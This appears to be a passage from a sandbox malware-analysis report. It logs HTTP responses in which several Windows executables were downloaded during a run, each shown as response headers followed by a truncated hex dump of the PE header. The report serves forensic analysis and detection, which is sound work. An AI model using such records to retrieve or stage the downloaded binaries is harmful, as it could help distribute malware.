00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 03:20:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 03:20:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 03:20:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 03:20:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 03:20:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 03:20:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 03:20:11 GMTContent-Type: application/octet-streamContent-Length: 423840Last-Modified: Tue, 01 Oct 2024 13:44:45 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfccd-677a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 20 06 00 00 06 00 00 00 00 00 00 ee 3e 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 a1 95 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 3e 06 00 53 00 00 00 00 40 06 00 42 02 00 00 00 00 00 00 00 00 00 00 78 51 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 60 3d 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 1e 06 00 00 20 00 00 00 20 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 06 00 00 04 00 00 00 22 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 3e 06 00 00 00 00 00 48 00 00 00 02 00 05 00 40 2b 06 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 42 2c d1 93 c8 4a 65 ad 38 b7 18 2a c6 c0 85 02 b3 e5 ca 58 66 dc e9 33 f5 0c 5a 6d 97 10 f4 76 07 24 3a be 9f dc 72 84 b7 89 d0 ea 1f 58 f2 1e 82 4d be cd 36 27 34 b2 db b6 2c 